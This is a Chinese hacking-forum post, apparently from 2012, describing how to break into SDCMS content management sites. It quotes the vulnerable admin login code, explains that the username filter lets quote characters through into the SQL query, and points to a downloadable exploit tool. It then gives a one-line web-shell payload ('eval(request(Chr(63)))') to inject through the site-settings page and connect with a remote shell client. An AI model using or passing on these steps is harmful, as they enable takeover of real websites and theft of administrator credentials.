|
作者:T00LS 鬼哥
漏洞文件:后台目录/index.asp Sub Check Dim username,password,code,getcode,Rs IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub username=FilterText(Trim(Request.Form("username")),1) password=FilterText(Trim(Request.Form("password")),1) code=Trim(Request.Form("yzm")) getcode=Session("SDCMSCode") IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)":Died IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)":Died IF username="" or password="" Then Echo "用户名或密码不能为空":Died Else Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'") IF Rs.Eof Then AddLog username,GetIp,"登录失败",1 Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会" Else Add_Cookies "sdcms_id",Rs(0) Add_Cookies "sdcms_name",username Add_Cookies "sdcms_pwd",Rs(2) Add_Cookies "sdcms_admin",Rs(3) Add_Cookies "sdcms_alllever",Rs(4) Add_Cookies "sdcms_infolever",Rs(5) Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"") AddLog username,GetIp,"登录成功",1 '自动删除30天前的Log记录 IF Sdcms_DataType Then Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30") Else Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30") End IF Go("sdcms_index.asp") End IF Rs.Close Set Rs=Nothing End IFEnd Sub’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码Function FilterText(ByVal t0,ByVal t1) IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function t0=Trim(t0) Select Case t1 Case "1" t0=Replace(t0,Chr(32),"") t0=Replace(t0,Chr(13),"") t0=Replace(t0,Chr(10)&Chr(10),"") t0=Replace(t0,Chr(10),"") Case "2" t0=Replace(t0,Chr(8),"")'回格 t0=Replace(t0,Chr(9),"")'tab(水平制表符) t0=Replace(t0,Chr(10),"")'换行 t0=Replace(t0,Chr(11),"")'tab(垂直制表符) t0=Replace(t0,Chr(12),"")'换页 t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合 t0=Replace(t0,Chr(22),"") t0=Replace(t0,Chr(32),"")'空格 SPACE t0=Replace(t0,Chr(33),"")'! t0=Replace(t0,Chr(34),"")'" t0=Replace(t0,Chr(35),"")'# t0=Replace(t0,Chr(36),"")'$ t0=Replace(t0,Chr(37),"")'% t0=Replace(t0,Chr(38),"")'& t0=Replace(t0,Chr(39),"")'' t0=Replace(t0,Chr(40),"")'( t0=Replace(t0,Chr(41),"")') t0=Replace(t0,Chr(42),"")'* t0=Replace(t0,Chr(43),"")'+ t0=Replace(t0,Chr(44),"")', t0=Replace(t0,Chr(45),"")'- t0=Replace(t0,Chr(46),"")'. t0=Replace(t0,Chr(47),"")'/ t0=Replace(t0,Chr(58),"")': t0=Replace(t0,Chr(59),"")'; t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'> t0=Replace(t0,Chr(63),"")'? t0=Replace(t0,Chr(64),"")'@ t0=Replace(t0,Chr(91),"")'\ t0=Replace(t0,Chr(92),"")'\ t0=Replace(t0,Chr(93),"")'] t0=Replace(t0,Chr(94),"")'^ t0=Replace(t0,Chr(95),"")'_ t0=Replace(t0,Chr(96),"")'` t0=Replace(t0,Chr(123),"")'{ t0=Replace(t0,Chr(124),"")'| t0=Replace(t0,Chr(125),"")'} t0=Replace(t0,Chr(126),"")'~ Case Else t0=Replace(t0, "&", "&") t0=Replace(t0, "'", "'") t0=Replace(t0, """", """) t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">") End Select IF Instr(Lcase(t0),"expression")>0 Then t0=Replace(t0,"expression","e xpression", 1, -1, 0) End If FilterText=t0End Function看到没。直接参数是1 只过滤 t0=Replace(t0,Chr(32)," ") t0=Replace(t0,Chr(13),"") t0=Replace(t0,Chr(10)&Chr(10),"") t0=Replace(t0,Chr(10),"")漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP 测试:
 现在输入工具上验证码,然后点OK
 看到我们直接进入后台管理界面了,呵呵! 
这样直接进入后台了。。。。
SDCMS提权: 方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是? 
OK,现在用菜刀连接下! 
|
窥视卡
雷达卡
发表于 2012-11-9 03:24:39
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
发表于 2014-9-16 21:35:43